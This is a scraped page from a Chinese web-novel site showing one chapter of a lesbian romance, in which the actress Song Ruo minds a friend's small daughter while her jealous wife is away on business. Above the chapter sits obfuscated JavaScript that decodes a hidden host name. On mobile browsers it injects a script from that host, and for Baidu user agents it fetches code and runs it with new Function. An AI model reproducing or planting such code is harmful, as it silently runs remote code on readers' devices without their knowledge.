98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(10(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟姗姗解释:就是,咱们家和若若阿姨家离得近,又很亲密,你肯定比其他小朋友更先认识她们家的孩子,这样你就占优势,抢得先机,拔得头筹,可以最先和她们家的小宝宝做朋友。别人就是想抢在你前边,那也不能够。这样,就叫做,近水楼台先得月。

谢文聘没有接着问什么叫抢得先机拔得头筹,而是问:那小宝宝长大了,会有若若阿姨这么好看吗?

孟姗姗为表郑重,还真的抬头看了看对面的宋若,又看了看孟璟,思考了一两秒的样子,表示她是在认真对待她的提问,然后才点头,笑着说:有吧。

孟姗姗的意思,无非就是说,孟璟在颜值上没给宋若拉后腿,孟璟又不是傻子,当然听出来了,可她怎么心这么塞,没半点高兴呢。

这特么情敌还有完没完,还真小到三岁大到三百岁都来抢她的人啊。是个什么鬼传统啊!

孟璟到离开孟璟那栋屋子,都还有点忿忿不平,和太太说:老婆,以后都不许和谢文聘见面。

宋若看看她:人家三岁。你几岁?

我才不管呢!三岁才可怕,三岁看到老,谁家孩子三岁想结婚啊,孟璟真的气得飞起来,她妈谢琼小时候不就是老打你主意,看来遗传给她的不止脸呢,还有这颗司马昭之心。

你说话过过脑子成吗。陈芝麻烂谷子的,有意思?

近年谢琼确实是安静如鸡的,对盛雪也很好。翻这本旧账的确是不怎么公道。孟璟也就不言语了,但是嘴巴依然嘟得老长。

若若忍不住要笑,但此情此景笑出来,孟璟只怕心态要崩,敛住了,伸手在她脸颊轻轻拧了一把,轻轻说:好啦好啦,我不和她见面,好不好。

然而这个诺言终究是打破了,若若和谢文聘非但见了面,还单独待在一起生活了好几天。时间是在这次隆冬会面后的次年夏末。

盛雪大度,谢琼和宋若之间有那么点过往,她并不介意,甚至把最宝贝的女儿送来若若这。

不然也不来劳烦你了,这不我和谢琼想去旅行一趟,不想带着这个小侦探,这里侦破那里探案的,搞得我们不得安宁,两边的老人都各有各的事要忙,我们家文聘又最喜欢你了,天天在家念你,压岁钱全都存起来买你的海报,别的事情她妈妈我可能无能为力,这不正好我有幸认识你宋大影后吗,怎么样,帮个忙,全了她的追星梦吧?盛雪端的舌灿莲花,况且她鲜少拜托宋若什么事,头回开口,让人很难拒绝。

宋若也有那么千分之一的好奇,家里有个小孩子一起生活,感觉是什么样儿。她跟着张院长的日子,细节在记忆里已经很朦胧了,那时候她本身是小孩,也不可以同日而语。

盛雪趁热打铁又加了一句:我还听倪羽晴说,你下部戏有一个阶段是要和孩子演对手戏的,这不正好,拿我们谢文聘练练手?找找戏的感觉?

话都说到这份儿上了。

盛雪推着孩子的肩膀往宋若这边一送,若若怕小孩跌倒,下意识伸手去扶。其实盛雪怎么会用大力气?不过是做个样子。是谢文聘自己冲锋的。

宋若醒悟过来时,小孩已经在她怀里,两只小手巴着她的膝盖,两眼亮闪闪地,奶声奶气说了一声:若若阿姨,你好美。

好的,这下大局已定。

巧的是这次孟璟恰好飞到日本谈生意去了。大概一个星期之后才能回来。

等于说是和小谢单独相处,宋若有点紧张。她不知道自己能不能照顾好小孩子。

盛雪走了以后,她起身先把桌上的茶杯收拾了一下,放到洗碗池冲过一遍,在架子上晾着,再坐回原本的位子上,不知道先说点什么,只能朝小谢微微笑了一笑,将糖果篓子推到她面前,示意她自己动手。

她这一笑,谢文聘立刻就像得到什么许可似的,迈着两条小短腿噔噔噔地跑过来了,两只小爪子握住她的手,信誓旦旦:若若,你不要害怕啊,我会保护你的。

宋若一挑眉,在她的小鼻梁上轻轻一捏,不许没大没小。叫阿姨。

谢文聘仰起小脸,咧开嘴露出个大大的笑容。

孟璟接到盛雪的电话时,用暴跳如雷来形容也并不为过,当场暴走道:你怎么回事啊,我又不在家,我老婆一个人已经很辛苦了,你还送个祖宗过去让她伺候,你没事吧?

你懂什么,就因为知道你不在,我才把孩子送过去陪你老婆两天。

孟璟哈了一声:你一个做母亲的人,能不能说话不要这么下流,我的老婆我自己不会陪吗,轮得到别人?

盛雪蹙眉:你才是满脑子什么废料呢,若若能干着呢,我做她助理那会儿,她能滴水不漏照顾一整个剧组的人,照顾个把小孩子哪里在话下,你也太操心了。

孟璟长叹,槽多无口,剧组都是成年人,关照一下当然不费事,你自己家里保姆司机一应俱全,照顾起小孩来当然也没什么麻烦,我老婆可是一个人在家你懂不,你那崽子吃喝拉撒都得她管,她好容易休息几天,你还不让人歇歇气,不带你这么折腾人的。

盛雪眯了眯眼:我看你就是吃醋吧,上次我听谢琼她妈说了,还以为孟女士夸张,看来是真的啊,这么小孩子的醋你都吃,你神经病吧。

孟璟冷笑:是啊,你没说错,我就是不放心,你这方面基因当然没什么问题,一派正气,我那位表姐可是一肚子坏水儿,我真怕你那崽子吃我老婆豆腐。

盛雪揉揉太阳穴。

你赶紧把孩子接回来,要是我老婆磕着碰着点儿,我告你,几十年的发小情分就一笔勾销了。

盛雪干脆挂了电话。

孟璟倒在酒店的床上,是越想越不是个滋味儿。麻溜儿就轰了个电话回家,比平时约定的视频时间还早两个小时呢。一般两个人是聊着天入眠。

一看视频,孟璟更加要炸了,若若正穿着件素雅的白底浅绿藤蔓花的围裙,在厨房洗手作羹汤!

啊啊啊啊老婆你干嘛穿这个?孟璟要疯了,一面要流鼻血,心里又是一缸醋酸得厉害。

做点心。

什么点心!牛奶牛奶小方。

你从来没给我做过牛奶小方!怎么能做给别人吃呢,还是谢琼家的闺女,不行的,绝对不可以。

若若眼睛微微瞪大:你知道她在这?顿了顿又点头,一副了然的神色,仿佛提醒孟璟不必说了,沾着点面粉的手朝不远处招了招,聘聘,你过来。和鲸鱼阿姨打个招呼。

孟璟险些背过气去,怎么就聘聘了。很熟吗!

小姑娘身上穿着件小裙子,手上拿着一小块苹果,勤恳地在那啃啊啃,对着镜头挥了挥小爪子,鲸鱼阿姨。

孟璟对着这么个小孩又确实没法凶神恶煞,只能装模作样地叮嘱了两句,不要惹事,要乖乖的,不可以让若若阿姨太辛苦云云。

挂了电话,孟璟抱着双臂在房间来回踱了好几圈,把日程表拿出来看了一眼,恨不得立刻回家去才好。但是约好的事情,贸然改时间,实在不是一种专业的态度。她颓然坐在床尾,被床垫上的弹簧给弄得颠簸了几下,床对面恰好有一面穿衣镜,她一下子将自己的表情看得十分清楚。对着镜子哑了半晌,噗嗤一声笑出来。整个人仰倒在床,拉过被子蒙住脸。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间